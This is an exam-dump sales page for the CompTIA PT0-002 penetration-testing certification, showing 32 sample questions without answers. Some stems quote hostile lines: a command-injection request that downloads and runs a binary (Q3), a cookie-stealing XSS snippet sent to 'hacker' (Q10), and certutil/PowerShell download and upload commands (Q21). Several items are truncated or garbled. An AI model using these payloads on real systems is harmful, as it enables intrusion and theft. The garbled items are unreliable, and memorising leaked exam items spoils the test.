Secure Checkout

100% SECURE CHECKOUT

Buy your braindumps confidently with our secure SSL certification and safe payment methods.

Read More
Download Demo

DOWNLOAD 100% FREE DEMO

Download the demo of your desired dumps free on just one click before purchase. 100% singup free demo.

Read More
Guarentee

100% MONEY BACK GUARANTEE

Get your certification in 1st attempt or get your 100% payment back according to our refund policy.

Read More
Customer Support

24/7 CUSTOMER SUPPORT

Resolve your issues and queries quickly with our dedicated 24/7 live customer support team.

Read More

CompTIA PT0-002 Dumps

We at Dumpssure certify you that our platform is one of the most authentic website for CompTIA PT0-002 exam questions and their correct answers. Pass your CompTIA PT0-002 exam with flying marks, and that too with little effort. With the purchase of this pack, you wil also get free demo questions dumps. We ensure your 100% success in PT0-002 Exam with the help of our provided material.

DumpsSure offers a unique Online Test Engine where you can fully practice your PT0-002 exam questions. This is one-of-a-kind feature which our competitors won't provide you. Candidates can practice the way they would want to attempt question at the real examination time.

Dumpssure also offers an exclusive 'Exam Mode' where you can attempt 50 random questions related to your PT0-002 exam. This mode is exactly the same as of real PT0-002 certification exam. Attempt all the questions within a limited time and test your knowledge on the spot. This mode will definitely give you an edge in real exam.

Our success rate from past 6 years is above 96% which is quite impressive and we're proud of it. Our customers are able to build their career in any field the wish. Let's dive right in and make the best decision of your life right now. Choose the plan you want, download the PT0-002 exam dumps and start your preparation for a successful professional.

Why Dumpssure is ever best for the preparation for CompTIA PT0-002 exam?

Dumpssure is providing free CompTIA PT0-002 question answers for your practice, to avail this facility you just need to sign up for a free account on Dumpssure. Thousands of customers from entire world are using our PT0-002 dumps. You can get high grades by using these dumps with money back guarantee on PT0-002 dumps PDF.

A vital device for your assistance to pass your CompTIA PT0-002 Exam

Our production experts have been preparing such material which can succeed you in CompTIA PT0-002 exam in a one day. They are so logical and notorious about the questions and their answers that you can get good marks in CompTIA PT0-002 exam. So DUMPSSURE is offering you to get excellent marks.

Easy access on your mobile for the users

The basic mean of Dumpssure is to provide the most important and most accurate material for our users. You just need to remain connected to internet for getting updates even on your mobile. After purchasing, you can download the CompTIA PT0-002 study material in PDF format and can read it easily, where you have desire to study.

CompTIA PT0-002 Questions and Answers can get instantly

Our provided material is regularly updated step by step for new questions and answers for CompTIA Exam Dumps, so that you can easily check the behaviour of the question and their answers and you can succeed in your first attempt.

CompTIA PT0-002 Dumps are demonstrated by diligence Experts

We are so keen to provide our users with that questions which are verified by the CompTIA Professionals, who are extremely skilled and have spent many years in this field.

Money Back Guarantee

Dumpssure is so devoted to our customers that we provide to most important and latest questions to pass you in the CompTIA PT0-002 exam. If you have purchased the complete PT0-002 dumps PDF file and not availed the promised facilities for the CompTIA exams you can either replace your exam or claim for money back policy which is so simple for more detail visit Guarantee Page.

CompTIA PT0-002 Sample Questions

Question # 1

A penetration tester has been hired to perform a physical penetration test to gain access toa secure room within a client’s building. Exterior reconnaissance identifies two entrances, aWiFi guest network, and multiple security cameras connected to the Internet.Which of the following tools or techniques would BEST support additional reconnaissance?c

A. Wardriving
B. Shodan
C. Recon-ng
D. Aircrack-ng



Question # 2

Given the following script:while True:print ("Hello World")Which of the following describes True?

A. A while loop
B. A conditional
C. A Boolean operator
D. An arithmetic operator



Question # 3

A penetration tester was able to gain access to a system using an exploit. The following isa snippet of the code that was utilized:exploit = “POST ”exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} –c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”exploit += “HTTP/1.1”Which of the following commands should the penetration tester run post-engagement?

A. grep –v apache ~/.bash_history > ~/.bash_history
B. rm –rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM “apache” /F



Question # 4

A penetration tester has obtained shell access to a Windows host and wants to run aspecially crafted binary for later execution using the wmic.exe process call create function.Which of the following OS or filesystem mechanisms is MOST likely to support thisobjective?

A. Alternate data streams
B. PowerShell modules
C. MP4 steganography
D. PsExec



Question # 5

Which of the following is a regulatory compliance standard that focuses on user privacy byimplementing the right to be forgotten?

A. NIST SP 800-53
B. ISO 27001
C. GDPR



Question # 6

Penetration on an assessment for a client organization, a penetration tester noticesnumerous outdated software package versions were installed ...s-critical servers. Which ofthe following would best mitigate this issue?

A. Implementation of patching and change control programs
B. Revision of client scripts used to perform system updates
C. Remedial training for the client's systems administrators
D. Refrainment from patching systems until quality assurance approves



Question # 7

Which of the following OSSTM testing methodologies should be used to test under theworst conditions?

A. Tandem
B. Reversal
C. Semi-authorized
D. Known environment



Question # 8

A client wants a security assessment company to perform a penetration test against its hotsite. The purpose of the test is to determine the effectiveness of the defenses that protectagainst disruptions to business continuity. Which of the following is the MOST importantaction to take before starting this type of assessment?

A. Ensure the client has signed the SOW.
B. Verify the client has granted network access to the hot site.
C. Determine if the failover environment relies on resources not owned by the client.
D. Establish communication and escalation procedures with the client.



Question # 9

Which of the following factors would a penetration tester most likely consider when testingat a location?

A. Determine if visas are required.
B. Ensure all testers can access all sites.
C. Verify the tools being used are legal for use at all sites.
D. Establish the time of the day when a test can occur.



Question # 10

Given the following code: var+img=new+Image();img.src=”<a href="http://hacker/%20+%20document.cookie">http://hacker/%20+%20document.cookie</a>;</SCvar+img=new+Image();img.src=”<a href="http://hacker/%20+%20document.cookie">http://hacker/%20+%20document.cookie</a>;</SC RIPT>Which of the following are the BEST methods to prevent against this type of attack?(Choose two.)

A. Web-application firewall
B. Parameterized queries
C. Output encoding
D. Session tokens
E. Input validation
F. Base64 encoding



Question # 11

A penetration tester learned that when users request password resets, help desk analystschange users' passwords to 123change. The penetration tester decides to brute force aninternet-facing webmail to check which users are still using the temporary password. Thetester configures the brute-force tool to test usernames found on a text file and the... Whichof the following techniques is the penetration tester using?

A. Password brute force attack
B. SQL injection
C. Password spraying
D. Kerberoasting



Question # 12

A penetration tester is exploring a client’s website. The tester performs a curl commandand obtains the following:* Connected to 10.2.11.144 (::1) port 80 (#0)> GET /readmine.html HTTP/1.1> Host: 10.2.11.144> User-Agent: curl/7.67.0> Accept: */*>* Mark bundle as not supporting multiuse< HTTP/1.1 200< Date: Tue, 02 Feb 2021 21:46:47 GMT< Server: Apache/2.4.41 (Debian)< Content-Length: 317< Content-Type: text/html; charset=iso-8859-1<<!DOCTYPE html><html lang=”en”><head> <meta name=”viewport” content=”width=device-width” /><meta http-equiv=”Content-Type” content=”text/html; charset=utf-8” /><title>WordPress &#8250; ReadMe</title><link rel=”stylesheet” href=”wp-admin/css/install.css?ver=20100228” type=”text/css” /></head>Which of the following tools would be BEST for the penetration tester to use to explore thissite further?

A. Burp Suite
B. DirBuster
C. WPScan
D. OWASP ZAP



Question # 13

When accessing the URL http://192.168.0-1/validate/user.php, a penetration testerobtained the following output ..d index: eid in /apache/www/validate/user.php line 12 ..d index: uid in  /apache/www/validate/user.php line 13 ..d index: pw in /apache/www/validate/user.php line 14 ..d index: acl in /apache/www/validate/user.php line 15 

A. Lack of code signing
B. Incorrect command syntax
C. Insufficient error handling
D. Insecure data transmission



Question # 14

A penetration tester wrote the following comment in the final report: "Eighty-five percent ofthe systems tested were found to be prone to unauthorized access from the internet."Which of the following audiences was this message intended?

A. Systems administrators
B. C-suite executives
C. Data privacy ombudsman
D. Regulatory officials



Question # 15

A penetration tester runs a scan against a server and obtains the following output:21/tcp open ftp Microsoft ftpd| ftp-anon: Anonymous FTP login allowed (FTP code 230)| 03-12-20 09:23AM 331 index.aspx| ftp-syst:135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows Server 2012 Std3389/tcp open ssl/ms-wbt-server| rdp-ntlm-info:| Target Name: WEB3| NetBIOS_Computer_Name: WEB3| Product_Version: 6.3.9600|_ System_Time: 2021-01-15T11:32:06+00:008443/tcp open http Microsoft IIS httpd 8.5| http-methods:|_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/8.5|_http-title: IIS Windows ServerWhich of the following command sequences should the penetration tester try NEXT?

A. ftp 192.168.53.23
B. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest
C. ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23
D. curl –X TRACE https://192.168.53.23:8443/index.aspx
E. nmap –-script vuln –sV 192.168.53.23



Question # 16

In an unprotected network file repository, a penetration tester discovers a text filecontaining usernames and passwords in cleartext and a spreadsheet containing data for 50employees, including full names, roles, and serial numbers. The tester realizes some of thepasswords in the text file follow the format: <name- serial_number>. Which of the followingwould be the best action for the tester to take NEXT with this information?

A. Create a custom password dictionary as preparation for password spray testing.
B. Recommend using a password manage/vault instead of text files to store passwordssecurely.
C. Recommend configuring password complexity rules in all the systems and applications.
D. Document the unprotected file repository as a finding in the penetration-testing report.



Question # 17

Company.com has hired a penetration tester to conduct a phishing test. The tester wants toset up a fake log-in page and harvest credentials when target employees click on links in aphishing email. Which of the following commands would best help the tester determinewhich cloud email provider the log-in page needs to mimic?

A. dig company.com MX
B. whois company.com
C. cur1 www.company.com
D. dig company.com A



Question # 18

During a penetration test, a tester is in close proximity to a corporate mobile devicebelonging to a network administrator that is broadcasting Bluetooth frames.Which of the following is an example of a Bluesnarfing attack that the penetration testercan perform?

A. Sniff and then crack the WPS PIN on an associated WiFi device.
B. Dump the user address book on the device.
C. Break a connection between two Bluetooth devices.
D. Transmit text messages to the device.



Question # 19

A company recently moved its software development architecture from VMs to containers.The company has asked a penetration tester to determine if the new containers areconfigured correctly against a DDoS attack. Which of the following should a tester performfirst?

A. Test the strength of the encryption settings.
B. Determine if security tokens are easily available.
C. Perform a vulnerability check against the hypervisor.
D. .Scan the containers for open ports.



Question # 20

A penetration tester breaks into a company's office building and discovers the companydoes not have a shredding service. Which of the following attacks should the penetrationtester try next?

A. Dumpster diving
B. Phishing
C. Shoulder surfing
D. Tailgating



Question # 21

A penetration tester has obtained a low-privilege shell on a Windows server with a defaultconfiguration and now wants to explore the ability to exploit misconfigured servicepermissions. Which of the following commands would help the tester START this process?

A. certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’)
C. schtasks /query /fo LIST /v | find /I “Next Run Time:”
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe



Question # 22

Which of the following documents describes activities that are prohibited during ascheduled penetration test?

A. MSA
B. NDA
C. ROE
D. SLA



Question # 23

During a penetration tester found a web component with no authentication requirements.The web component also allows file uploads and is hosted on one of the target public webthe following actions should the penetration tester perform next?

A. Continue the assessment and mark the finding as critical.
B. Attempting to remediate the issue temporally.
C. Notify the primary contact immediately.
D. Shutting down the web server until the assessment is finished



Question # 24

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

A. Badge cloning 
B. Watering-hole attack 
C. Impersonation 
D. Spear phishing



Question # 25

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible? 

A. A list 
B. A tree 
C. A dictionary 
D. An array 



Question # 26

A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information? 

A. Badge cloning 
B. Dumpster diving 
C. Tailgating 
D. Shoulder surfing 



Question # 27

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision? 

A. The tester had the situational awareness to stop the transfer. 
B. The tester found evidence of prior compromise within the data set. 
C. The tester completed the assigned part of the assessment workflow. 
D. The tester reached the end of the assessment time frame. 



Question # 28

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective? 

A. Wait for the next login and perform a downgrade attack on the server. 
B. Capture traffic using Wireshark. 
C. Perform a brute-force attack over the server. 
D. Use an FTP exploit against the server. 



Question # 29

Given the following output: User-agent:* Disallow: /author/ Disallow: /xmlrpc.php Disallow: /wp-admin Disallow: /page/ During which of the following activities was this output MOST likely obtained? 

A. Website scraping 
B. Website cloning
 C. Domain enumeration 
D. URL enumeration 



Question # 30

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment? 

A. Partially known environment testing 
B. Known environment testing 
C. Unknown environment testing 
D. Physical environment testing 



Question # 31

A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router. Which of the following is MOST vulnerable to a brute-force attack? 

A. WPS 
B. WPA2-EAP 
C. WPA-TKIP
 D. WPA2-PSK 



Question # 32

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report? 

A. S/MIME 
B. FTPS 
C. DNSSEC 
D. AS2 



What Our Client Says